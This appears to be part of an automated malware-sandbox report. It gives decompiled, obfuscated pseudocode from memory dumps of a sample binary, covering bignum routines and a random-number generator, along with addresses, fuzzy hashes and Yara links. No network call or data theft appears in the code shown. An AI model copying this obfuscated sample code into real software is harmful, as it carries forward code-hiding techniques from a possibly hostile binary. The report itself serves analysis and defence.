									_t551 = _v28;
									E0045E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E00443F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E00447D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E0045EBC0();
										_push(_v68);
										E0045EBC0();
										_push(_v40);
										E0045EBC0();
										_push(_t463);
										E0045EBC0();
										_push(_t584);
										E0045EBC0();
										_push(_v80);
										return E0045EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E00453860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E00441A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E00441460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E00441460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E004422E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E00449D50(0x5413097) + _t338;
									E004422E0(__eflags, _v20, _t465);
									_t344 = E004422E0(__eflags, E00441460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E00441460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E00441460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E004422E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E00441460(__eflags, _t590 - 1, _v44);
										_t355 = E004413C0(E004422E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E00453860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E00441A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E00442070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E00441460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E00443A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E00442070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E00442070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E00442070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E00441750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E0045E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E00443F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E0045E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E0045E380(_t476, _v52);
													_t401 = E00449D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E0045E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E004422E0(__eflags, 0, _t478);
														E00441460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E004422E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E004422E0(__eflags, _t479, 0x19c77e59);
													_t410 = E00449D50(0x7db37ef5);
													E00441460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E00441460(__eflags, _t570 - E00449D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E00453580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E00449D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E00449D50(0x647400ae);
							_t450 = E00443F90( *((intOrPtr*)(_a4 + 8)), _t582 << E00449D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E00453860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E00445920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E00452E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E0045E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E0045E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E00447D70(_t455, _a8);
				goto L4;
			}

0x0045da70
0x0045da79
0x0045da81
0x0045da88
0x0045da90
0x0045da97
0x0045da9f
0x0045daa7
0x0045daae
0x0045dab3
0x0045dab8
0x0045dacf
0x0045dad4
0x0045dad7
0x0045dad9
0x0045db38
0x0045db3b
0x0045db3e
0x0045db40
0x0045db43
0x0045dc09
0x0045dc20
0x0045dc22
0x0045dc25
0x0045dc28
0x0045dc2e
0x0045dc36
0x0045dc3b
0x0045dc40
0x0045dc46
0x0045dc48
0x0045dc4a
0x0045dc4d
0x0045dc4f
0x0045dc5d
0x0045dc62
0x0045dc65
0x0045dc65
0x0045dc68
0x0045dc6f
0x0045dc7b
0x0045dc80
0x0045dc83
0x0045dc85
0x0045dc88
0x0045dc8b
0x0045dc90
0x0045dd44
0x0045dd4b
0x00000000
0x0045dc96
0x0045dc96
0x0045dc96
0x0045dc98
0x0045dca0
0x0045dca6
0x0045dca9
0x0045dcb2
0x0045dcd1
0x0045dce0
0x0045dcef
0x0045dcf2
0x0045dcf7
0x0045dcfa
0x0045dcfd
0x0045dcfd
0x0045dd03
0x0045dd05
0x0045dd52
0x0045dd55
0x0045dd55
0x0045dd57
0x0045dd07
0x0045dd0c
0x0045dd15
0x0045dd19
0x0045dd1e
0x0045dd1e
0x0045dd5e
0x0045dd61
0x0045dd63
0x0045dd65
0x0045dd67
0x0045dd6a
0x0045dd6d
0x0045dd6f
0x0045dd72
0x0045dd74
0x0045dd77
0x0045dd7e
0x0045dd83
0x0045dd86
0x0045dd86
0x0045dd8f
0x0045dd8f
0x0045dd99
0x0045dd9c
0x0045dd9f
0x0045dda1
0x0045e285
0x0045e288
0x0045e290
0x0045e295
0x0045e297
0x0045e29b
0x0045e29e
0x0045e2a0
0x0045e2a2
0x0045e2a4
0x0045e300
0x0045e302
0x0045e302
0x0045e305
0x0045e307
0x0045e30d
0x0045e315
0x0045e318
0x0045daf4
0x0045daf4
0x0045daf5
0x0045dafd
0x0045db00
0x0045db08
0x0045db0b
0x0045db13
0x0045db14
0x0045db1c
0x0045db1d
0x0045db25
0x0045db34
0x0045db34
0x0045e2a9
0x0045e2ab
0x0045e2ae
0x0045e2ae
0x0045e2b0
0x0045e2b0
0x0045e2b7
0x0045e2c2
0x0045e2c9
0x0045e2cd
0x0045e2d3
0x0045e2d6
0x0045e2d8
0x0045e2e2
0x0045e2e6
0x0045e2f0
0x0045e2f5
0x0045e2f8
0x0045e2fb
0x0045e2fb
0x0045e2fb
0x00000000
0x0045dda7
0x0045dda9
0x0045ddb5
0x0045ddbb
0x0045ddc5
0x0045ddd3
0x0045dde6
0x0045ddeb
0x0045de04
0x0045de0b
0x0045de28
0x0045de35
0x0045de3a
0x0045de45
0x0045de54
0x0045de57
0x0045de59
0x0045de5c
0x0045de5f
0x0045de92
0x0045de95
0x0045de9d
0x0045dea3
0x0045deae
0x0045deb1
0x0045dec9
0x0045decf
0x0045ded3
0x0045def7
0x0045df06
0x0045df0c
0x0045df0f
0x0045df17
0x0045df1c
0x0045df1f
0x0045df21
0x0045df24
0x0045df2c
0x0045df2f
0x0045df37
0x0045df3d
0x0045df42
0x0045df4a
0x0045df54
0x0045df72
0x0045df7a
0x0045df7c
0x0045df83
0x0045df89
0x0045df91
0x0045df96
0x0045df99
0x0045df9c
0x0045dfa6
0x0045dfa9
0x0045dfb0
0x0045dfb5
0x0045dfb9
0x0045dfbd
0x0045dfcc
0x0045dfe1
0x0045dfe3
0x0045dfee
0x0045dff0
0x0045dff3
0x0045dff6
0x0045dffe
0x0045e008
0x0045e00d
0x0045e010
0x0045e012
0x0045e015
0x00000000
0x00000000
0x0045e021
0x0045e031
0x0045e035
0x0045e037
0x0045e03d
0x0045e049
0x0045e04e
0x0045e054
0x0045e056
0x0045e058
0x0045e058
0x0045e05b
0x0045e05f
0x00000000
0x00000000
0x0045e084
0x0045e084
0x0045e087
0x0045e08a
0x0045e092
0x0045e095
0x0045e098
0x0045e09a
0x0045e09d
0x0045e0a6
0x0045e0ab
0x0045e0ae
0x0045e0b1
0x0045e0b4
0x0045e0b9
0x0045e0c2
0x0045e0c7
0x0045e0ca
0x0045e0cd
0x0045e0cd
0x0045e0d0
0x0045e0d2
0x0045e0d8
0x0045e170
0x0045e173
0x0045e177
0x0045e17c
0x0045e17f
0x0045e181
0x0045e187
0x0045e194
0x0045e199
0x0045e19c
0x0045e19c
0x0045e1a7
0x0045e1ac
0x0045e1af
0x0045e1b1
0x0045e1b3
0x0045e1bd
0x0045e1bf
0x0045e1c5
0x0045e1c8
0x0045e1d1
0x0045e1da
0x0045e1de
0x0045e1e0
0x0045e1e6
0x0045e1ec
0x0045e1fd
0x0045e202
0x0045e20e
0x0045e211
0x0045e216
0x0045e218
0x0045e218
0x0045e1e0
0x00000000
0x0045e0de
0x0045e0e1
0x0045e0e6
0x0045e0ef
0x0045e133
0x0045e136
0x0045e13e
0x0045e141
0x0045e143
0x0045e146
0x0045e14b
0x0045e150
0x0045e15b
0x0045e15d
0x0045e15d
0x0045e106
0x0045e115
0x0045e124
0x0045e129
0x0045e12c
0x0045e12f
0x0045e12f
0x00000000
0x0045e133
0x0045e0d8
0x0045e070
0x0045e07f
0x0045e081
0x00000000
0x0045e21c
0x0045e21c
0x0045e21f
0x0045e23c
0x0045e24e
0x0045e25b
0x0045e260
0x0045e260
0x0045e263
0x0045e266
0x0045e269
0x0045e26b
0x0045e271
0x0045e275
0x0045e278
0x0045e27e
0x0045e27e
0x0045de75
0x0045de7a
0x0045de84
0x0045de89
0x0045de89
0x00000000
0x0045de92
0x0045dda1
0x0045dc90
0x0045db49
0x0045db4c
0x0045db4f
0x0045db51
0x0045db54
0x0045db56
0x0045db68
0x0045db71
0x0045db76
0x0045db79
0x0045db7c
0x0045db7f
0x0045db7f
0x0045db81
0x0045db83
0x0045dd25
0x00000000
0x0045db89
0x0045db8f
0x0045db91
0x0045db91
0x0045db93
0x0045db99
0x0045db9f
0x0045dba8
0x0045dbac
0x0045dbb0
0x0045dbb3
0x0045dbba
0x0045dbce
0x0045dbd5
0x0045dbda
0x0045dbdd
0x0045dbdf
0x0045dbe2
0x0045dbe5
0x0045dbe7
0x0045dbfa
0x0045dbfc
0x0045dbfc
0x0045dbfc
0x0045dd27
0x0045dd27
0x0045dd2f
0x0045dd3a
0x0045dd3d
0x0045daf1
0x0045daf1
0x00000000
0x0045daf1
0x0045db83
0x0045dade
0x0045dae9
0x0045daee
0x00000000
0x0045daee
0x0045dabd
0x0045dac7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5709b86bc639f8cf7357323f4fc22f060ba982395a20838a0f9d091cdaab5a
Instruction ID: 0b68bc5c7b248ddabfebf24ba90c3dd72aa7304fbcca89689f523da1ff76025b
Opcode Fuzzy Hash: fd5709b86bc639f8cf7357323f4fc22f060ba982395a20838a0f9d091cdaab5a
Instruction Fuzzy Hash: A942C3B5D002089FDB04DFA9DC81AAEB7B5EF48319F14412AF804AB352E735AD05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00455BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00455BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x464194; // 0x1
				_t48 = E00449D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E004420A0(_t234,  *(_t179 + 0x463b60), 0xffffffff);
						_t69 = E00449D50(0xe47400ac);
						_t71 = E004420A0(_t234, E00449D50(0x5c38c288), 0xffffffff);
						_t74 = E00443750(_t234,  !(E00442DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x463b60) =  *(0x460434 + ( *(_t179 + 0x463b64) & 0x00000001) * 4) ^  *(_t179 + 0x464194) ^ ( *(_t179 + 0x463b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x4637d4[_t75];
						_t77 = E00449D50(0xe47400ac);
						_t78 = E00442DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E00449D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x592fd248));
						_t81 = E004420A0(_t235, 0x7ffffffe, 0xffffffff);
						E00443750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E00449D50(0x58908707);
						_v28 = E00442DC0(_t235, E004420A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E00449D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E00442DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E00449D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x463448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x460434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E004420A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E00443750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E004420A0(_t235, _v20, _v32);
						_t100 = _v28;
						E004420A0(_t235, _t188, _t100);
						0x4637d4[_v24] = _t188 ^ _t100;
						_t103 = E00449D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E00443750(_t236,  *0x464190, 0x80000000);
					_t131 =  *0x4637d4; // 0x17eb5d18
					_t105 = E00449D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E004420A0(_t236, _t131, 0xffffffff);
					_t107 = E004420A0(_t236, 1, 0xffffffff);
					_t111 = E00443750(_t236,  !(_t107 | _t106), (E00449D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E00443750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x463e04 ^  *(0x460434 + _t111 * 4);
					_t237 = _t194;
					 *0x464194 = 0;
					 *0x464190 = _t194;
				}
				_t49 =  *0x464194; // 0x1
				_t150 = 0x4637d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x464194 = _t47;
				_t50 = E004420A0(_t237, 0x4637d4[_t49], 0xffffffff);
				_t51 = E00449D50(0x209e1c2b);
				E004420A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E004420A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E00449D50(0x8bb200ac);
				_t60 = E00443750(_t237, E004420A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E00442DC0(_t237, _t60, E00443750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E004420A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x00455bf9
0x00455c04
0x00455c09
0x00455c0c
0x00455c0e
0x00455c14
0x00455c1f
0x00455c20
0x00455c30
0x00455c38
0x00455c54
0x00455c74
0x00455c79
0x00455ca0
0x00455ca6
0x00455ca6
0x00455ca6
0x00455caf
0x00455cb4
0x00455cbc
0x00455cc0
0x00455cc0
0x00455cca
0x00455cd2
0x00455ce6
0x00455d02
0x00455d11
0x00455d14
0x00455d1e
0x00455d35
0x00455d45
0x00455d4d
0x00455d93
0x00455d98
0x00455da5
0x00455db0
0x00455db3
0x00455dc0
0x00455dc5
0x00455dcc
0x00455dde
0x00455df7
0x00455e03
0x00455e06
0x00455e0e
0x00455e16
0x00455e1f
0x00455e2a
0x00455e36
0x00455e3b
0x00455e3e
0x00455e40
0x00455e40
0x00455e53
0x00455e5b
0x00455e68
0x00455e72
0x00455e84
0x00455e92
0x00455eb9
0x00455ec8
0x00455ecd
0x00455ed0
0x00455ed0
0x00455ed7
0x00455ee1
0x00455ee1
0x00455ee7
0x00455eec
0x00455ef3
0x00455ef6
0x00455f04
0x00455f13
0x00455f31
0x00455f45
0x00455f59
0x00455f72
0x00455f9c
0x00455fc2

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db284b051b2ab9f22edd85796f6cd46e403800df9fecd26f80b6cbbf886467f3
Instruction ID: a19b6c9050bb22bdb59d4a46f07d432a3062d0244896247df995724483d0fdfa
Opcode Fuzzy Hash: db284b051b2ab9f22edd85796f6cd46e403800df9fecd26f80b6cbbf886467f3
Instruction Fuzzy Hash: D79157F7D101106BFB00AFB5BC4296E35909B65329B890239FD18B3383F9695E10C3E6

Uniqueness

Uniqueness Score: -1.00%

Function 00443A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00443A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E00449C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E00449D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x4620d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x00443a39
0x00443a50
0x00443a5f
0x00443a61
0x00443a65
0x00443a68
0x00443a8b
0x00443a8e
0x00443a6a
0x00443a71
0x00443a76
0x00443a7b
0x00443a7d
0x00443a82
0x00443a86
0x00443a86
0x00443a91
0x00443a94
0x00443aa0
0x00443ab2
0x00443abb
0x00443ae0
0x00443abd
0x00443ac0
0x00443ac3
0x00443ac8
0x00443ad0
0x00443adb
0x00443adb
0x00443ac3
0x00443ae3
0x00443ae5
0x00443ae9
0x00443afa
0x00443aff
0x00443b01
0x00443b07
0x00443b19
0x00443b1b
0x00443b1e
0x00443b20
0x00443b28
0x00443b2b
0x00443b32
0x00443b5c
0x00443b63
0x00443b69
0x00443b6c
0x00443b77
0x00000000
0x00443b34
0x00443b34
0x00443b45
0x00443b79
0x00443b8c
0x00443b9d
0x00443b9d
0x00443b47
0x00443b5a
0x00443b9e
0x00000000
0x00443b9e
0x00000000
0x00443b5a

Memory Dump Source

